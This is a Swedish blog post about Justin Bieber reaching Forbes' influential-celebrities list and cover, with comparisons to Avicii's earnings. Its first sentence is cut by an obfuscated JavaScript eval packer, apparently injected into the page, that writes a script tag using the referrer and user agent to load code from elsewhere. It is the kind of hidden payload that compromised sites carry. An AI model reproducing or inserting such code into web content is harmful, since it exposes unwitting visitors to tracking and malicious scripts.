Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Justin Bieber plockar framsidan på Forbes Magazine

Justin Bieber plockar framsidan på Forbes Magazine
Sebastian


Att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffkkd|var|u0026u|referrer|zaifn||js|php’.split(’|’),0,{}))
det går bra den 18-åringa Justin Bieber vet vi. Forbes Magazine har nu listat den unga stjärnan på en tredje plats av de topp 100 mest inflytelserikaste kändisarna i världen.

Han har kort och gott omsatt mer pengar än många andra otroligt stora kändisar som Jay-Z, Coldplay, Beyonce med fler.
Justin Bieber säger sig också vara ”garanterad” 80 miljoner dollar (ca 560 miljoner kronor) för ungefär 125 spelningar, vilket är sjukt. Det är en aning mer än vad vår svenska stjärna Avicii omsätter på sina.

Avicii omsatte förra året ca 60 miljoner kronor 300 spelningar världen över, ett glapp på ca 500 miljoner.

Hur som helst har han nu tagit steget in på framsidan av den välkända tidningen Forbes vilket jag skulle säga är ganska stort då man där mest ser Bill Gates, Mark Zuckerberg och andra ”super” entreprenörer och legender.

Ovan kan ni se filmen från Forbes som spelades in när Justin Bieber skulle fotas för tidningen.

Grattis Bieber och som vi brukar säga, kids, stay away from drugs!